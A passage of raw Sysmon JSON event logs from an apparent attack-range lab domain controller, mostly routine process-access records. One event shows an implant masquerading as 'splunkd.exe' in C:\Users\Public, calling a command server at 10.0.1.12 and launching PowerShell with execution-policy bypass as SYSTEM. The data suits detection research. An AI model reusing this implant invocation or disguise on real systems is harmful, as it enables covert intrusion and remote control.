C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1725,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1726,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1727,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1728,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1729,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.302\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001064670300}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.302","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001064670300}","TargetProcessId":"3920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1730,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.514\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-0010CA730300}\r\nProcessId: 3948\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: powershell.exe -ExecutionPolicy Bypass -C jrmwub\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nParentProcessId: 2308\r\nParentImage: C:\\Users\\Public\\splunkd.exe\r\nParentCommandLine: \"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.514","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010CA730300}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"powershell.exe -ExecutionPolicy Bypass -C jrmwub","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-1061-5F25-0000-001069980200}","ParentProcessId":"2308","ParentImage":"C:\\Users\\Public\\splunkd.exe","ParentCommandLine":"\"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp ","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1731,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.514\r\nSourceProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nSourceProcessId: 2308\r\nSourceThreadId: 1468\r\nSourceImage: C:\\Users\\Public\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010CA730300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Users\\Public\\splunkd.exe+5c36e","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.514","SourceProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","SourceProcessId":"2308","SourceThreadId":"1468","SourceImage":"C:\\Users\\Public\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010CA730300}","TargetProcessId":"3948","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Users\\Public\\splunkd.exe+5c36e","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1732,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.514\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010CA730300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.514","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010CA730300}","TargetProcessId":"3948","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1733,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.514\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 